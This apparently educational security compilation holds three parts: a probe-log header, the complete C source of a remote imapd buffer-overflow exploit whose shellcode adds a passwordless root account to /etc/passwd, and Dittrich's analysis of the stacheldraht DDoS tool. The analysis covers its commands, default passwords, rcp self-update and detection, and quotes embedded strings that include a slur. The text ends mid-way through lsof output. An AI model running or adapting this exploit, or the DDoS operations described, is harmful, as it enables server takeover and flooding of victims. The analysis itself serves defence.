probed.txt - Know your enemy #1

#
# All the probes my network received in a single month.
# Starting 15 April, 2000
#
# You can lookup the IDS number signatures at
# Max Vision's ArachNIDs database at
# http://www.whitehats.com
#
# Signatures captured using snort
# http://www.snort.org
#
EoF

imapd.c exploit - Know your enemy #1

/*
 * This is the remote exploit of the hole in the imap daemon, for Linux.
 * The instruction code is doing open(), write(), and close() system calls,
 * and it adds a line root::0:0.. at the beginning of /etc/passwd (change to
 * /etc/shadow if needed). The code needs to be self modifying since imapd
 * turns everything to lowercase before it pushes it on the stack.
 * The problem is that it rewrites the first line of passwd/shadow,
 * therefore losing the root password. I'm sorry, but I don't have time
 * to add in the seek syscall.
 *   - Akylonius (aky@galeb.etf.bg.ac.yu) [1997]
 *
 * Modifications made on 5.1.97 to accept command line hostname, with
 * 'h_to_ip' function that resolves it to an ip.
 *   - p1 (p1@el8.org)
 */

/* Header names were lost in extraction; these are the ones the code needs. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

char *h_to_ip(char *hostname);

/* Resolve a hostname to a dotted-quad string. */
char *h_to_ip(char *hostname)
{
    struct hostent *h;
    struct sockaddr_in tmp;
    struct in_addr in;

    h = gethostbyname(hostname);
    if (h == NULL) {
        perror("Resolving the host. \n");
        exit(-1);
    }
    memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length);
    memcpy(&in, &tmp.sin_addr.s_addr, 4);
    return (inet_ntoa(in));
}

void banner(void)
{
    system("clear");
    printf("\nIMAP Exploit for Linux.\n");
    printf("\n\tAuthor: Akylonius (aky@galeb.etf.bg.ac.yu)\n");
    printf("   Modifications: p1 (p1@el8.org)\n");
}

int main(int argc, char **argv)
{
    int fd;
    struct sockaddr_in sckdaddr;
    char *hostname;
    char buf[4092];
    int i = 8;
    char realegg[] =
        "\xeb\x58\x5e"
        "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
        "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
        "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
        "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
        "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
        "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
        "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
        "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
        "iamaselfmodifyingmonsteryeahiam\xe8\x83\xff\xff\xff"
        "/etc/passwdxroot::0:0:r00t:/:/bin/bashx";
    char *point = realegg;

    /* The IMAP command prefix: "* login " */
    buf[0] = '*';
    buf[1] = ' ';
    buf[2] = 'l';
    buf[3] = 'o';
    buf[4] = 'g';
    buf[5] = 'i';
    buf[6] = 'n';
    buf[7] = ' ';

    banner();
    if (argc < 2) {
        printf("\nUsage: %s \n\n", argv[0]);
        exit(-1);
    }
    hostname = argv[1];

    /* NOP sled, then the egg, then the saved frame pointer and return address. */
    while (i < 1034 - sizeof(realegg) - 1) /* -sizeof(realegg)+1) */
        buf[i++] = 0x90;
    while (*point)
        buf[i++] = *(point++);
    buf[i++] = 0x83; /* ebp */
    buf[i++] = 0xf3;
    buf[i++] = 0xff;
    buf[i++] = 0xbf;
    buf[i++] = 0x88; /* ret adr */
    buf[i++] = 0xf8;
    buf[i++] = 0xff;
    buf[i++] = 0xbf;
    buf[i++] = ' ';
    buf[i++] = 'b';
    buf[i++] = 'a';
    buf[i++] = 'h';
    buf[i++] = '\n';
    buf[i++] = 0x0;

    if ((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        perror("Error opening the socket. \n");
    sckdaddr.sin_port = htons(143);
    sckdaddr.sin_family = AF_INET;
    sckdaddr.sin_addr.s_addr = inet_addr(h_to_ip(hostname));
    if (connect(fd, (struct sockaddr *)&sckdaddr, sizeof(sckdaddr)) < 0)
        perror("Error with connecting. \n");
    printf("hmm: \n");
    getchar();
    write(fd, buf, strlen(buf) + 1);
    printf("hmm: \n");
    close(fd);
    return 0;
}

The stacheldraht DoS analysis - Know your enemy #1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

==========================================================================
The "stacheldraht" distributed denial of service attack tool
==========================================================================

David Dittrich
University of Washington
Copyright 1999. All rights reserved.
December 29, 1999

Introduction
------------

The following is an analysis of "stacheldraht", a distributed denial of service attack tool, based on source code from the "Tribe Flood Network" distributed denial of service attack tool.

[Note that throughout this analysis, actual nicks, site names, and IP addresses have been sanitized.]

Stacheldraht (German for "barbed wire") combines features of the "trinoo" distributed denial of service tool, with those of the original TFN, and adds encryption of communication between the attacker and stacheldraht masters and automated update of the agents. For more information on trinoo and TFN, see:

http://staff.washington.edu/dittrich/misc/trinoo.analysis
http://staff.washington.edu/dittrich/misc/tfn.analysis

In late June and early July of 1999, one or more groups were installing and testing trinoo networks and waging medium to large scale denial of service attacks employing networks of over 2000 compromised systems. These attacks involved, and were aimed at, systems around the globe. In late August/early September of 1999, focus began to shift from trinoo to TFN, presumed to be the original code by Mixter. Then in late September/early October, a program that looked a lot like the TFN agent, known as "stacheldraht", began to show up on systems in Europe and the United States.
These attacks prompted CERT to release Incident Note 99-04:

  http://www.cert.org/incident_notes/IN-99-04.html

Like trinoo, stacheldraht is made up of master (handler) and daemon, or
"bcast" (agent) programs. The handler/agent terminology was developed at
the CERT Distributed System Intruder Tools workshop held in November 1999,
and will be used in this analysis instead of the stacheldraht specific
terms. It is highly recommended that the CERT workshop report be read as
well. See:

  http://www.cert.org/reports/dsit_workshop.pdf

There is some competition to stacheldraht in the form of Mixter's new
version of TFN -- Tribe Flood Network 2000, or TFN2K -- released on
December 21, 1999. For more on TFN2K, see:

  http://packetstorm.securify.com/distributed/
  http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html

Along with trinoo's handler/agent features, stacheldraht also shares TFN's
features of distributed network denial of service by way of ICMP flood,
SYN flood, UDP flood, and "Smurf" style attacks. Unlike the original TFN
and TFN2K, the analyzed stacheldraht code does not contain the "on demand"
root shell bound to a TCP port (it may be based on earlier TFN code than
was made public by Mixter in mid-1999).

One of the weaknesses of TFN was that the attacker's connection to the
master(s) that control the network was in clear-text form, and was subject
to standard TCP attacks (session hijacking, RST sniping, etc.)
Stacheldraht deals with this by adding an encrypting "telnet alike"
(stacheldraht term) client.

Stacheldraht agents were originally found in binary form on a number of
Solaris 2.x systems, which were identified as having been compromised by
exploitation of buffer overrun bugs in the RPC services "statd", "cmsd"
and "ttdbserverd". They have been witnessed "in the wild" as late as the
writing of this analysis.
After publishing analyses of trinoo and Tribe Flood Network on Bugtraq in
December 1999, an incident investigator at another institution provided
stacheldraht source code that was obtained from a file cache in a stolen
account. (I would like to thank this investigator, and also thank the
folks at SecurityFocus for providing the open forum that allowed this to
occur.)

This analysis was done using this captured source code (labelled version
1.1, with source file modification dates ranging from 8/15/1999 to
10/17/1999). The Makefiles contain rules for Linux and Solaris, with the
default being Linux (even though it appears that the code does not work
very reliably on Linux). For the purposes of this analysis, all programs
were compiled and run on Red Hat Linux 6.0 systems. As far as I am aware,
the agent has been witnessed "in the wild" only on Solaris 2.x systems.

One thing that may not have been clearly stated in the analyses done on
trinoo and Tribe Flood Network is that distributed denial of service
attacks are two phase attacks, with "victims" and "attackers" that are
defined depending on your point of view.

There is an initial mass-intrusion phase, in which automated tools are
used to remotely root compromise large numbers (i.e., in the several
hundred to several thousand ranges) and the distributed denial of service
agents are installed on these compromised systems. These are primary
victims (of system compromise.) None of these distributed denial of
service tools have any features that facilitate compromising systems, and
these automated tools are held closely by those groups who wrote them.

The mass-intrusion phase is followed by the actual denial of service
attack phase, in which these compromised systems which constitute the
handlers and agents of the distributed attack network are used to wage
massive denial of service attacks against one or more sites. These are
secondary victims (of denial of service).
[For a description of the methods used in the initial intrusion and
network setup phases, see the analysis of the trinoo network, referenced
in Appendix A.]

Remember that modification of the source code can and would change any of
the details of this analysis, such as prompts, passwords, commands,
TCP/UDP port numbers, or supported attack methods, signatures, and
features.

The network: client(s)-->handler(s)-->agent(s)-->victim(s)
------------------------------------------------------------

The stacheldraht network is made up of one or more handler programs
("mserv.c") and a large set of agents ("leaf/td.c"). The attacker uses an
encrypting "telnet alike" program to connect to and communicate with the
handlers ("telnetc/client.c").

A stacheldraht network would look like this:

                  +--------+             +--------+
                  | client |             | client |
                  +--------+             +--------+
                      |                      |
      . . . --+------+---------------+------+----------------+-- . . .
              |      |               |      |                |
              |      |               |      |                |
        +-----------+        +-----------+          +-----------+
        |  handler  |        |  handler  |          |  handler  |
        +-----------+        +-----------+          +-----------+
              |      |               |      |                |
              |      |               |      |                |
   . . . ---+------+-----+------------+---+--------+------------+-+-- . . .
            |      |     |            |   |        |            | |
            |      |     |            |   |        |            | |
        +-------+ +-------+ +-------+ +-------+ +-------+
        | agent | | agent | | agent | | agent | | agent |
        +-------+ +-------+ +-------+ +-------+ +-------+

The attacker(s) control one or more handlers using encrypting clients.
Each handler can control many agents. (There is an internal limit in the
"mserv.c" code to 1000 agents. It is not known why 1000 was chosen, but
the code does say that "1000 sockets are leet0.") The agents are all
instructed to coordinate a packet based attack against one or more victim
systems by the handler (referred to as an "mserver" or "master server" in
the code.)
Communication
-------------

Client to handler(s):        16660/tcp
Handler to/from agent(s):    65000/tcp, ICMP ECHO_REPLY

Unlike trinoo, which uses UDP for communication between handlers and
agents, or the original Tribe Flood Network, which uses ICMP for
communication between the handler and agents, stacheldraht uses TCP and
ICMP.

Remote control of a stacheldraht network is accomplished using a simple
client that uses symmetric key encryption for communication between
itself and the handler. The client accepts a single argument, the address
of the handler to which it should connect. It then connects using a TCP
port (default 16660/tcp in the analyzed code). The attacker sees the
following (if the proper password is given):

---------------------------------------------------------------------------
# ./client 192.168.0.1
                [*] stacheldraht [*]
                (c) in 1999 by ...

trying to connect...
connection established.
--------------------------------------
enter the passphrase : sicken
--------------------------------------
entering interactive session.
******************************
welcome to stacheldraht
******************************
type .help if you are lame

stacheldraht(status: a!1 d!0)>
---------------------------------------------------------------------------

The prompt shows the number of agents that are believed to be active
("a!") and dead ("d!") at the time.
Using the command ".help" (let's assume, for the sake of argument, that we
are lame) shows the supported command set:

---------------------------------------------------------------------------
stacheldraht(status: a!1 d!0)>.help
available commands in this version are:
--------------------------------------------------
.mtimer .mudp .micmp .msyn .msort .mping
.madd .mlist .msadd .msrem .distro .help
.setusize .setisize .mdie .sprange .mstop .killall
.showdead .showalive
--------------------------------------------------
stacheldraht(status: a!1 d!0)>
---------------------------------------------------------------------------

Commands
--------

.distro user server
    Instructs the agent to install and run a new copy of itself using
    the Berkeley "rcp" command, on the system "server", using the
    account "user" (e.g., "rcp user@server:linux.bin ttymon")

.help
    Prints a list of supported commands.

.killall
    Kills all active agents.

.madd ip1[:ip2[:ipN]]
    Add IP addresses to list of attack victims.

.mdie
    Sends die request to all agents.

.mdos
    Begins DoS attack.

.micmp ip1[:ip2[:ipN]]
    Begin ICMP flood attack against specified hosts.

.mlist
    List IP addresses of hosts being DoS attacked at the moment.

.mping
    Pings all agents (bcasts) to see if they are alive.

.msadd
    Adds a new master server (handler) to the list of available
    servers.

.msort
    Sort out dead/alive agents (bcasts). (Sends pings and shows
    counts/percentage of dead/alive agents).

.mstop ip1[:ip2[:ipN]]
.mstop all
    Stop attacking specific IP addresses, or all.

.msrem
    Removes a master server (handler) from the list of available
    servers.

.msyn ip1[:ip2[:ipN]]
    Begin SYN flood attack against specified hosts.

.mtimer seconds
    Set timer for attack duration. (No checks on this value.)

.mudp ip1[:ip2[:ipN]]
    Begin UDP flood attack against specified hosts. (Trinoo DoS
    emulation mode.)

.setisize
    Sets size of ICMP packets for flooding. (max:1024, default:1024).

.setusize
    Sets size of UDP packets for flooding (max:1024, default:1024).
.showalive
    Shows all "alive" agents (bcasts).

.showdead
    Shows all "dead" agents (bcasts).

.sprange lowport-highport
    Sets the range of ports for SYN flooding (defaults to lowport:0,
    highport:140).

Password protection
-------------------

After connecting to the handler using the client program, the attacker
is prompted for a password. This password (default "sicken" in the
analyzed code) is a standard crypt() encrypted password, which is then
Blowfish encrypted using the passphrase "authentication" before being
sent over the network to the handler (*all* communication between the
agent and handler is Blowfish encrypted with this passphrase.)

Like TFN, C macros ("config.h") define values used for expressing
commands, replacement argument vectors ("HIDEME" and "HIDEKIDS") to
conceal program names, etc.:

---------------------------------------------------------------------------
#ifndef _CONFIG_H

/* user defined values for the teletubby flood network */

#define HIDEME "(kswapd)"
#define HIDEKIDS "httpd"
#define CHILDS 10

/* These are like passwords, you might want to change them */

#define ID_SHELL 1          /* to bind a rootshell */
#define ID_ADDR 699         /* ip add request for the flood server */
#define ID_SETPRANGE 2007   /* set port range for synflood */
#define ID_SETUSIZE 2006    /* set udp size */
#define ID_SETISIZE 2005    /* set icmp size */
#define ID_TIMESET 2004     /* set the flood time */
#define ID_DIEREQ 2003      /* shutdown request of the masterserver */
#define ID_DISTROIT 2002    /* distro request of the master server */
#define ID_REMMSERVER 2001  /* remove added masterserver */
#define ID_ADDMSERVER 2000  /* add new masterserver request */
#define SPOOF_REPLY 1000    /* spoof test reply of the master server */
#define ID_TEST 668         /* test of the master server */
#define ID_ICMP 1055        /* to icmp flood */
#define ID_SENDUDP 2        /* to udp flood */
#define ID_SENDSYN 3        /* to syn flood */
#define ID_SYNPORT 4        /* to set port */
#define ID_STOPIT 5         /* to stop flooding */
#define ID_SWITCH 6         /* to switch spoofing mode */
#define ID_ACK 7            /* for replies to the client */

#define _CONFIG_H
#endif
---------------------------------------------------------------------------

As you can see, it is recommended that these be changed to prevent
someone stumbling across the agents from knowing what values are used,
thereby allowing them to execute agent commands.

Fingerprints
------------

As with trinoo and Tribe Flood Network, the methods used to install the
handler/agent will be the same as installing any program on a compromised
Unix system, with all the standard options for concealing the programs
and files (e.g., use of hidden directories, "root kits", kernel modules,
etc.)

One feature of stacheldraht not shared by trinoo or TFN is the ability to
upgrade the agents on demand. This feature employs the Berkeley "rcp"
command (514/tcp), using a stolen account at some site as a cache. On
demand, all agents are instructed to delete the current program image, go
out and get a new copy (either Linux- or Solaris-specific binary) from a
site/account using "rcp", start running this new image with "nohup", and
then exit.

As for identifying the programs in the file system, there are (provided
they are not edited out) some discernible strings. Strings embedded in
the encrypting client ("client") include the following:

------------------------------------------------------------------------------
. . .
connection closed.
usage: ./sclient
                [*] stacheldraht [*]
                (c) in 1999 by ...
trying to connect...
unable to resolv %s
unable to connect.
connection established.
--------------------------------------
enter the passphrase :
authentication failed
authentication failed.
entering interactive session.
./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
huhu
. . .
------------------------------------------------------------------------------

Strings embedded in the handler ("mserv") include the following:

------------------------------------------------------------------------------
. . .
%d.%d.%d.%d
jbQ4yQaKLbFZc
* mtimer reached *
.quit
exiting...
you need to stop the packet action first.
.help
.version
[*]stacheldraht[*] mserver version: 1.1
setusize
setisize
mdos
mping
mudp
micmp
msyn
mstop
mtimer
madd
mlist
msort
msadd
msrem
distro
sprange
killall
showdead
showalive
add some bcasts mofo.
killing all active childs...
usage: .sprange
example: .sprange 0-140
low port is : %i
high port is : %i
request was sent to the network.
usage: .setusize
current udp packet size is %ibytes
udp packet size was set to %i bytes.
udp packet size is too large.
usage: .setisize
current icmp packet size is %ibytes
icmp packet size was set to %i bytes.
icmp packet size is too large.
sending mass die request...
finished.
.mudp
starting trinoo emulation...
removing useful commands.
- DONE -
available commands in this version are:
--------------------------------------------------
.mtimer .mudp .micmp .msyn .msort .mping
.madd .mlist .msadd .msrem .distro .help
.setusize .setisize .mdie .sprange .mstop .killall
.showdead .showalive
usage: .distro
remember : the distro files need to be executable!
that means: chmod +x linux.bin , chmod +x sol.bin ;))
sending distro request to all bcasts....
user : %s
rcp server :
unable to resolve - %s
unable to send distro request.
request was sent, wait some minutes ;)
usage: .msrem
removing masterserver -
failed.
usage: .msadd
adding masterserver -
no packet action at the moment, sir.
the followings ip(s) are getting packeted...
--------------------------------------------
[*] stacheldraht [*] is packeting %d ips
[*] stacheldraht [*] is packeting 1 ip
.mstop all
deleting from packetlist...
%s - removed.
%s - skipped.
restarting packeting routines...
niggahbitch
usage: .madd
adding to packetlist...
%s - added.
usage: .mtimer
packet timer was set to %d seconds
usage: .mstop or
packeting stopped.
usage: .msyn
the net is already packeting.
mass syn flooding
%i floodrequests were sent to %i bcasts.
usage: .micmp
mass icmp bombing
usage: .mudp
mass udp bombing
tR1n00(status: a!%i d!%i)>
stacheldraht(status: a!%i d!%i)>
waiting for ping replies...
total bcasts : %d - 100%
alive bcasts : 0 - 0%
alive bcasts : %d - %d%
dead bcasts : %d - %d%
showing the alive bcasts...
---------------------------
alive bcasts: %i
showing the dead bcasts...
--------------------------
dead bcasts: %i
sorting out all the dead bcasts
-------------------------------
%d dead bcasts were sorted out.
bcasts
[*]-stacheldraht-[*] - forking in the background...
%i bcasts were successfully read in.
3.3.3.3
spoofworks
ficken
authentication failed
******************************
welcome to stacheldraht
type .help if you are lame
./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
huhu
[0;35mTribe Flood Network (c) 1999 by [5mMixter
. . .
------------------------------------------------------------------------------

Strings embedded in the agent ("td") include the following:

------------------------------------------------------------------------------
. . .
%d.%d.%d.%d
ICMP
Error sending syn packet.
tc: unknown host
3.3.3.3
mservers
randomsucks
skillz
ttymon
rm -rf %s
rcp %s@%s:linux.bin %s
nohup ./%s
1.1.1.1
127.0.0.1
lpsched
no masterserver config found. using default ones.
available servers: %i - working servers : 0
[*] stacheldraht [*] installation failed.
found a working [*] stacheldraht [*] masterserver.
masterserver is gone, looking for a new one
sicken
in.telne
./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
. . .
------------------------------------------------------------------------------

When each agent starts up, it attempts to read a master server
configuration file to learn which handler(s) may control it.
This file is a list of IP addresses, encrypted using Blowfish, with a
passphrase of "randomsucks". Failing to find a configuration file, there
are one or more default handler IP addresses compiled into the program
(shown above as "1.1.1.1" and "127.0.0.1" - these will obviously be
changed).

Once the agent has determined a list of potential handlers, it then
starts at the beginning of the list of handlers and sends an ICMP
ECHO_REPLY packet with an ID field containing the value 666 and data
field containing the string "skillz". If the master gets this packet, it
sends back an ECHO_REPLY packet with an ID field containing the value 667
and data field containing the string "ficken".

(It should be noted that there appears to be a bug that makes the handler
and agent send out some large, e.g., >1000 byte, packets. The handler and
agent continue periodically sending these 666|skillz / 667|ficken packets
back and forth. This would be one way of detecting agents/masters by
passively monitoring these ICMP packets.)

Seen with "sniffit" (modified per patches in the TFN analysis), these
packets look like this:

------------------------------------------------------------------------------
ICMP message id: 10.0.0.1 > 192.168.0.1
ICMP type: Echo reply

45 E 00 . 04 . 14 . 01 . 0F . 00 . 00 . 40 @ 01 . E9 . 53 S 0A . 00 . 00 . 01 .
C0 . A6 . 00 . 01 . 00 . 00 . B4 . 13 . 02 . 9A . 00 . 00 . 00 . 00 . 00 . 00 .
00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
00 . 00 . 73 s 6B k 69 i 6C l 6C l 7A z 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
00 . 00 .
. . .
[60 lines of zeros deleted]
00 . 00 . 00 . 00 .

ICMP message id: 192.168.0.1 > 10.0.0.1
ICMP type: Echo reply

45 E 00 . 04 . 14 . 04 . F8 . 00 . 00 . 40 @ 01 . E5 . 6A j C0 . A6 . 00 . 01 .
0A . 00 . 00 . 01 . 00 . 00 . CE . 21 ! 02 . 9B . 00 . 00 . 00 . 00 . 00 . 00 .
00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
00 . 00 . 66 f 69 i 63 c 6B k 65 e 6E n 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
00 . 00 .
. . .
[60 lines of zeros deleted]
00 . 00 . 00 . 00 .
------------------------------------------------------------------------------

In addition to finding an active handler, the agent performs a test to
see if the network on which the agent is running allows packets to exit
with forged source addresses. It does this by sending out an ICMP
ECHO_REPLY packet with a forged IP address of "3.3.3.3", an ID of 666,
and the IP address of the agent system (obtained by getting the hostname,
then resolving this to an IP address) in the data field of the ICMP
packet. (Note that it also sets the Type of Service field to 7 on this
particular packet, while others have a ToS value of 0.)

If the master receives this packet, it replies to the IP address embedded
in the packet with an ECHO_REPLY packet containing an ID of 1000 and the
word "spoofworks" in the data field. If the agent receives this packet,
it sets a spoof_level of 0 (can spoof all 32 bits of IP address). If it
times out before receiving a spoof reply packet, it sets a spoof_level of
3 (can only spoof the final octet).

These packets (as seen by tcpdump and tcpshow) are shown here:

------------------------------------------------------------------------------
# tcpdump icmp
. . .
14:15:35.151061 3.3.3.3 > 192.168.0.1: icmp: echo request [tos 0x7]
14:15:35.177216 192.168.0.1 > 10.0.0.1: icmp: echo reply
. . .

# tcpdump -lenx icmp | tcpshow -cooked
. . .
-----------------------------------------------------------------
Packet 5
        Timestamp:                      14:08:04.171310
        Source Ethernet Address:        00:10:1B:2B:3B:85
        Destination Ethernet Address:   00:00:F0:00:69:78
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x07
        Datagram Length:                112 bytes
        Identification:                 0x021C
        Flags:                          MF=off, DF=off
        Fragment Offset:                0
        TTL:                            255
        Encapsulated Protocol:          ICMP
        Header Checksum:                0x8408
        Source IP Address:              3.3.3.3
        Destination IP Address:         192.168.0.1
ICMP Header
        Type:                           echo-request
        Checksum:                       0xF7FF
        Id:                             0x0000
        Sequence:                       0x0000
ICMP Data
....................10.0.0.1.........................................
.........
        <*** Rest of data missing from packet dump ***>

Packet 7
        Timestamp:                      14:08:04.197954
        Source Ethernet Address:        00:00:C0:B6:84:E4
        Destination Ethernet Address:   00:00:F0:00:69:78
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x00
        Datagram Length:                1044 bytes
        Identification:                 0x198F
        Flags:                          MF=off, DF=off
        Fragment Offset:                0
        TTL:                            64
        Encapsulated Protocol:          ICMP
        Header Checksum:                0x3022
        Source IP Address:              192.168.0.1
        Destination IP Address:         10.0.0.1
ICMP Header
        Type:                           echo-reply
        Checksum:                       0xD7DA
        Id:                             0x03E8
        Sequence:                       0x0000
ICMP Data
....................spoofworks......................................
............................................................................
............................................................................
............................................................................
............................................................................
............................................................................
............................................................................
............................................................................
............................................................................
............................................................................
............................................................................
............................................................................
............................................................................
....................................
        <*** Rest of data missing from packet dump ***>
------------------------------------------------------------------------------

There is also code to perform an ID test, sending an ICMP ECHO_REPLY
packet with an ID field value of 669, and the string "sicken\n" in the
data field. This code is triggered if the handler is sent an ICMP
ECHO_REPLY packet with an ID field containing the value 668. The program
"gag" (see Appendix A) will allow you to probe for stacheldraht agents,
which will show up like this (tcpdump and tcpshow as modified per patches
in Appendix C):

------------------------------------------------------------------------------
Packet 1
        Timestamp:                      16:27:51.294727
        Source Ethernet Address:        00:00:C0:B6:84:E4
        Destination Ethernet Address:   00:00:F0:00:69:78
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x10
        Datagram Length:                40 bytes
        Identification:                 0x3558 (13656)
        Flags:                          MF=off, DF=on
        Fragment Offset:                0
        TTL:                            64
        Encapsulated Protocol:          ICMP
        Header Checksum:                0xA644
        Source IP Address:              10.0.0.2
        Destination IP Address:         198.168.0.1
ICMP Header
        Type:                           echo-reply
        Checksum:                       0xC61F
        Id:                             0x029C (668)
        Sequence:                       0x0000 (0)
ICMP Data
gesundheit!....
-----------------------------------------------------------------
Packet 2
        Timestamp:                      16:27:51.340321
        Source Ethernet Address:        00:10:1B:2B:3B:85
        Destination Ethernet Address:   00:00:F0:00:69:78
        Encapsulated Protocol:          IP
IP Header
        Version:                        4
        Header Length:                  20 bytes
        Service Type:                   0x00
        Datagram Length:                1044 bytes
        Identification:                 0x1D13 (7443)
        Flags:                          MF=off, DF=off
        Fragment Offset:                0
        TTL:                            64
        Encapsulated Protocol:          ICMP
        Header Checksum:                0xFAA7
        Source IP Address:              192.168.0.1
        Destination IP Address:         10.0.0.2
ICMP Header
        Type:                           echo-reply
        Checksum:                       0xB71F
        Id:                             0x029D (669)
        Sequence:                       0x0000 (0)
ICMP Data
....................sicken
..................................................................
..........................................................................
..........................................................................
..........................................................................
..........................................................................
..........................................................................
..........................................................................
..........................................................................
..........................................................................
..........................................................................
..........................................................................
..........................................................................
..........................................................................
...................................
        <*** Rest of data missing from packet dump ***>
------------------------------------------------------------------------------

The script "gag" would be used like this.
First, build a list of all suspect systems (e.g., do an "nmap" OS
detection scan and find all Solaris and Linux systems on your network, or
just scan the entire network and find all active IP addresses). Start
"tcpdump" to capture all the potential replies for later use. Then start
"gag", passing it this list of IP addresses to check.

------------------------------------------------------------------------------
# tcpdump -s 1500 -w stach.dump 'icmp[4:2] = 669'

# ./gag -v iplist
sending packet [668/"gesundheit!"] to 192.168.0.1
sending packet [668/"gesundheit!"] to 192.168.0.30
sending packet [668/"gesundheit!"] to 192.168.1.2
sending packet [668/"gesundheit!"] to 192.168.1.5
sending packet [668/"gesundheit!"] to 192.168.2.10
sending packet [668/"gesundheit!"] to 192.168.3.6
. . .
------------------------------------------------------------------------------

To see the list of systems that returned ICMP ECHO_REPLY packets with ID
669, do the following:

------------------------------------------------------------------------------
# tcpdump -r stach.dump
tcpdump: Filtering in user process
15:27:57.520094 192.168.0.1 > 10.0.0.1: icmp: echo reply (DF)
15:28:01.984660 192.168.2.10 > 10.0.0.1: icmp: echo reply (DF)
------------------------------------------------------------------------------

To actually see the packet contents to confirm "sicken\n" is included,
you can do the following:

------------------------------------------------------------------------------
# tcpshow < stach.dump | egrep "Source IP|sicken"
tcpdump: Filtering in user process
        Source IP Address:              198.162.0.1
....................sicken
        Source IP Address:              192.168.2.10
....................sicken
------------------------------------------------------------------------------

[There are more elegant ways of doing this, like writing a robust and
feature filled C program with libnet (see Appendix B for reference), but
there wasn't enough time before Y2K eve to get elegant. What the heck.
Dirty works fine for me. I found three agents when I ran it "live."]

The strings "skillz", "spoofworks", "sicken", "niggahbitch", and "ficken"
-- all sent in ICMP data segments -- are not encrypted, so are visible in
the data portion of ICMP ECHO_REPLY packets. The ID values 666, 667, 668,
669, and 1000 would also be identifiable in the packet flow using the
above methods.

The stacheldraht handler, which forks to handle commands and listen for
ICMP packets, is seen on the system with "lsof" like this:

------------------------------------------------------------------------------
# lsof -c mserv
COMMAND  PID USER   FD   TYPE DEVICE    SIZE  NODE NAME
mserv   1072 root  cwd    DIR    3,3    2048 40961 /tmp/...
mserv   1072 root  rtd    DIR    3,3    1024     2 /
mserv   1072 root  txt    REG    3,3   50506 41421 /tmp/.../mserv
mserv   1072 root  mem    REG    3,3  342206 30722 /lib/ld-2.1.1.so
mserv   1072 root  mem    REG    3,3   63878 30731 /lib/libcrypt-2.1.1.so
mserv   1072 root  mem    REG    3,3 4016683 30729 /lib/libc-2.1.1.so
mserv   1072 root    0u   CHR  136,4            6 /dev/pts/4
mserv   1072 root    1u   CHR  136,4            6 /dev/pts/4
mserv   1072 root    2u   CHR  136,4            6 /dev/pts/4
mserv   1072 root    3u  sock    0,0         2143 can't identify protocol
mserv   1073 root  cwd    DIR    3,3    2048 40961 /tmp/...
mserv   1073 root  rtd    DIR    3,3    1024     2 /
mserv   1073 root  txt    REG    3,3   50506 41421 /tmp/.../mserv
mserv   1073 root  mem    REG    3,3  342206 30722 /lib/ld-2.1.1.so
mserv   1073 root  mem    REG    3,3   63878 30731 /lib/libcrypt-2.1.1.so
mserv   1073 root  mem    REG    3,3 4016683 30729 /lib/libc-2.1.1.so
mserv   1073 root    0u   CHR  136,4            6 /dev/pts/4
mserv   1073 root    1u   CHR  136,4            6 /dev/pts/4
mserv   1073 root    2u   CHR  136,4            6 /dev/pts/4
mserv   1073 root    3u  inet          2144       TCP *:16660 (LISTEN)
mserv   1088 root  cwd    DIR    3,3    2048 40961 /tmp/...
mserv   1088 root  rtd    DIR    3,3    1024     2 /
mserv   1088 root  txt    REG    3,3   50506 41421 /tmp/.../mserv
mserv   1088 root  mem    REG    3,3  342206 30722 /lib/ld-2.1.1.so
mserv   1088 root  mem    REG    3,3   63878 30731 /lib/libcrypt-2.1.1.so
mserv   1088 root  mem    REG    3,3 4016683 30729 /lib/libc-2.1.1.so
mserv   1088 root    0u   CHR  136,4            6 /dev/pts/4
mserv   1088 root    1u   CHR  136,4            6 /dev/pts/4
mserv   1088 root    2u   CHR  136,4            6 /dev/pts/4
mserv   1088 root    3r  FIFO    0,0         2227 pipe
mserv   1088 root    5w  FIFO    0,0         2227 pipe
mserv   1091 root  cwd    DIR    3,3    2048 40961 /tmp/...
mserv   1091 root  rtd    DIR    3,3    1024     2 /
mserv   1091 root  txt    REG    3,3   50506 41421 /tmp/.../mserv
mserv   1091 root  mem    REG    3,3  342206 30722 /lib/ld-2.1.1.so
mserv   1091 root  mem    REG    3,3   63878 30731 /lib/libcrypt-2.1.1.so
